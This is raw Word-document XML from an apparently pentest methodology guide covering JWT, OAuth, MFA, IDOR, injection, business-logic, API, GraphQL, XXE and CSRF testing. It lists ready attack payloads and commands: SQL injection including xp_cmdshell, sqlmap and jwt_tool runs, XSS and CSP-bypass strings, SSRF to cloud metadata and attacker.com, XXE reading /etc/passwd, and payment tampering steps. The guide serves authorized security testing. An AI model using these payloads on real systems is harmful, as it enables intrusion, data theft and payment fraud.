Editor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Burp → Installed Extensions → JWT Editor → Automated JWT attacks on all requests</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JWT Analysis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Decode JWT manually:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">echo "HEADER.PAYLOAD" | base64 -d</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Use jwt_tool for all JWT attacks:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install jwt-tool</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">jwt_tool eyJ... -t https://target.com/api/user -rh "Authorization: Bearer eyJ..." --exploit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All attacks in one command:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">jwt_tool eyJ... -M at -t https://target.com/protected -rh "Authorization: Bearer eyJ..."</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Crack weak secret:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">jwt_tool eyJ... -C -d SecLists/Passwords/Common-Credentials/best110.txt</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9.3 OAuth 2.0 / SAML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Description + Payload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OAuth State Parameter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if state parameter present + validated → If missing: CSRF on OAuth flow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Authorization Code Replay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Capture OAuth code → Replay it after use → Should be invalid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Redirect in redirect_uri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Modify redirect_uri to attacker domain → If allowed: token hijacking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SAML Response Tampering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Decode SAML response → Modify NameID, Role → Re-encode → Submit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SAML Signature Wrapping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Move valid signature to different element → Insert malicious assertion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OAuth Scope Escalation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Request auth with limited scope → Try to access resources requiring higher scope</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9.4 Multi-Factor Authentication (MFA)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MFA Bypass via Direct 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After login (pre-MFA) → Navigate directly to post-auth URL → Should enforce MFA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OTP Brute Force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Burp Intruder on OTP field → Payload: 000000-999999 (6-digit) → Check for rate limit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OTP Reuse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OTP → Submit same OTP again → Should be invalid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OTP Expiry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Wait 5+ minutes → Submit old OTP → Should be expired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Response Manipulation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Submit wrong OTP → Intercept response → Change "success": false to true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OTP via Email Timing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Request OTP → Observe if email enumeration possible via timing difference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Test Phase 4 — Post-Authentication Testing</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POST-AUTH ZONE — Testing Everything After Successful Login</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10.1 Authorization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Payload / Method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Insecure Direct Object Reference (IDOR)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ID parameters: /api/user/123 → /api/user/124 — Access another user's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Horizontal Privilege Escalation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 A: capture request with their ID → Replace with User B's ID → Check if User A can access B's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Vertical Privilege Escalation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 (low priv) → Try admin endpoints: /admin/users, /api/admin/config → Should return 403</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Function Level Auth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MAP all admin functions → Test each from regular user → Check if 403/redirect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Mass Assignment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admin=true, role=admin, isAdmin=true to registration/update POST body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IDOR in File Downloads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file ID/name in download URL → Try to download other users' files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Insecure Direct Reference in GUID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 UUID-based IDs can be leaked via Referer headers, logs — check all sources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10.2 Injection Testing — Comprehensive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection — Complete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Command / Payload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Detection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Payload: '  OR  "  OR 1=1--  OR '1'='1 → Check for errors, behavioral change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Error-Based SQLi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MySQL: ' AND extractvalue(1,concat(0x7e,version()))--  | MSSQL: '; EXEC xp_cmdshell('id')--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Boolean Blind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AND 1=1--  (true condition) vs ' AND 1=2--  (false condition) → Different responses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Time-Based Blind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MySQL: ' AND sleep(5)--  | MSSQL: '; WAITFOR DELAY '0:0:5'--  | PostgreSQL: '||pg_sleep(5)--</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Union-Based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Determine columns: ' ORDER BY 1--  → increment until error | Then: ' UNION SELECT null,null,null--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SQLMap Automated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sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs --batch -v 3</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SQLMap POST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sqlmap -u "https://target.com/login" --data="user=a&amp;pass=b" --level=5 --dbs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SQLMap Headers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sqlmap -u "https://target.com/" -H "Cookie: session=abc" --cookie="session=*" --dbs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SQLMap API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sqlmap -u "https://api.target.com/v1/users/1" -H "Authorization: Bearer TOKEN" --dbs</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Cross-Site Scripting (XSS) — Comprehensive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1A3C7A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS PAYLOAD LIBRARY (Inject in ALL input fields, URL params, headers)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Basic:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"&gt;&lt;script&gt;alert(1)&lt;/script&gt;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Filter Bypass:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;ScRiPt&gt;alert(1)&lt;/ScRiPt&gt;  (case bypass)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script &gt;alert(1)&lt;/script &gt;  (space bypass)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;svg onload=alert(1)&gt;  (non-script tag)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;body onpageshow=alert(1)&gt;  (event handler)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">javascript:alert(1)  (in href)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;  (HTML entity)</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DOM-Based:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">#&lt;img src=x onerror=alert(1)&gt;  (hash-based)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">document.location='javascript:alert(1)'</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CSP Bypass:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;link rel="import" href="data:text/html,&lt;script&gt;alert(1)&lt;\/script&gt;"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;meta http-equiv="refresh" content="0;url=javascript:alert(1)"&gt;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Tool: XSStrike — Automated XSS:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python xsstrike.py -u "https://target.com/search?q=FUZZ" --crawl</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Server-Side Request Forgery (SSRF)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Basic SSRF</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https://attacker.com/callback (in URL params accepting URLs)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Internal Network Probe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http://127.0.0.1, http://localhost, http://169.254.169.254/latest/meta-data/ (AWS metadata)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 Metadata</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http://169.254.169.254/ (AWS) | http://metadata.google.internal/ (GCP) | http://169.254.169.254/metadata (Azure)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Protocol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file:///etc/passwd | file:///C:/Windows/System32/drivers/etc/hosts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DNS Rebinding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Burp Collaborator URL → Check for DNS/HTTP callbacks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Blind SSRF via Out-of-band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http://[YOUR-BURP-COLLABORATOR].burpcollaborator.net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SSRF Filter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@127.0.0.1, 127.0.0.1:443, 127.1, 0x7f000001, 2130706433</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Template Injection (SSTI)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r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Test Phase 5 — Business Logic Testing</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BUSINESS LOGIC ZONE — The Most Valuable and Overlooked Testing Area</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Business logic flaws cannot be detected by automated scanners. They require HUMAN intelligence. The platform guides the tester through thinking about the application's intended flow and testing what happens when you deviate.</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11.1 General Business Logic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Workflow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Map the intended flow (Step 1→2→3) → Try to skip steps by going directly to Step 3</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Negative Quantity Attack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Cart/order with qty=-1 → Check if price decreases or refund triggered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Price Manipulation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Intercept POST with price parameter → Modify to 0.01 or negative → Check if order completes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Race Condition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Turbo Intruder → Send 50 simultaneous coupon redemption requests → Check for multiple redemptions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Coupon/Voucher Abuse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Apply same coupon code multiple times → Use expired codes → Stack multiple discounts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Privilege Assumption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Perform admin-only action (delete user) from regular user session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Manipulation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order status from "pending" to "shipped" via parameter tampering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Multi-step Form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step 1 → Skip step 2 verification → Go to step 3 with manipulated data</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11.2 E-commerce / Payment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none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️ CONDITIONAL: Show only if Payment Gateway or Cart selected in stack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Zero-value Purchase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amount to 0 → Complete checkout → Check if order created without payment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Negative Amount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amount to -100 → Submit → Check for credit/refund without actual refund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Integer Overflow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Set quantity to 9999999999 → Check for integer overflow causing 0 or negative total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Payment Response Tampering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Intercept payment gateway callback → Change status from "failed" to "success"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Order ID Manipulation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payment → Modify order ID in callback to another user's pending order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Transaction Replay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Capture successful payment callback → Replay for multiple orders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Insufficient Stock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Set quantity above available stock → Complete purchase</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12. Test Phase 6 — API &amp; Web Services Testing</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API TESTING ZONE</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12.1 REST API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Method Tampering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GET→POST, POST→PUT, POST→DELETE on all endpoints → Check responses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Versioning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 /api/v1/, /api/v2/, /api/v0/, /api/beta/ → Check if older versions have less security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Mass Assignment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extra fields to POST body: "role": "admin", "isAdmin": true, "credits": 9999</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IDOR in APIs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user IDs, object IDs, account numbers in API calls → Access other users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Rate Limiting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Send 100 API requests in 1 minute → Check for rate limit headers + enforcement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Key in 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if API keys passed in URL query params (logged in proxy/server logs)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Unauthenticated Endpoints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Remove auth headers from every API call → Some may work without auth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BOLA (Broken Object Level Auth)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 A calls /api/v1/orders/123 (User B's order) → Should return 403</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BFLA (Broken Function Level Auth)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Regular user calls /api/v1/admin/users → Should return 403</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12.2 GraphQL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none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️ CONDITIONAL: Show only if GraphQL selected in stack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GraphQL Introspection — Information Gathering:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">{"query": "{__schema{types{name,fields{name}}}}" }</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Check if introspection disabled (should be in production):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">If introspection works → ALL schema info exposed → Major security issue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GraphQL Injection:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">{"query": "{ user(id: 1) { email password } }"}  # Try unauthorized field access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Batch Query Abuse (DoS/brute force bypass):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[{"query": "mutation { login(user: 'admin', pass: 'pass1') {token}}"},{"query": "mutation { login(user: 'admin', pass: 'pass2') {token}}"}]</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Tool: graphql-cop (automated GraphQL security testing):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python graphql-cop.py -t https://target.com/graphql</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Burp Extension: InQL — Auto-generates all queries from introspection</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12.3 SOAP / XML Web Services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none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️ CONDITIONAL: Show only if SOAP / XML selected in stack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Payload / Method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WSDL Enumeration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 ?wsdl or ?WSDL → Extract all operations, parameters, endpoints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XXE via SOAP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&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;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 Injection in SOAP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Inject SQL in SOAP body parameters: &lt;username&gt;admin'--&lt;/username&gt;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SOAP Header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malicious headers: &lt;Security&gt;&lt;UsernameToken&gt;&lt;Username&gt;admin&lt;/Username&gt;&lt;/UsernameToken&gt;&lt;/Security&gt;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SOAP Body Manipulation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operation name in request → Try to call unauthorized operations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12.4 XML External Entity (XXE) — Full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Basic XXE:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;root&gt;&amp;xxe;&lt;/root&gt;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XXE for SSRF:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "http://internal-server/admin"&gt;]&gt;&lt;root&gt;&amp;xxe;&lt;/root&gt;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Blind XXE (Out-of-band):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR.com"&gt;]&gt;&lt;root&gt;&amp;xxe;&lt;/root&gt;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XXE in SVG file upload:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE svg [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;svg&gt;&amp;xxe;&lt;/svg&gt;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XXE in JSON that accepts XML (change Content-Type: application/xml):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Change Content-Type header from application/json to application/xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">13. Test Phase 7 — Client-Side Testing</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CLIENT-SIDE ZONE — Browser &amp; JavaScript Security</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13.1 CSRF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CSRF PoC Generator — Burp Suite:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Capture state-changing request (POST) in Burp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
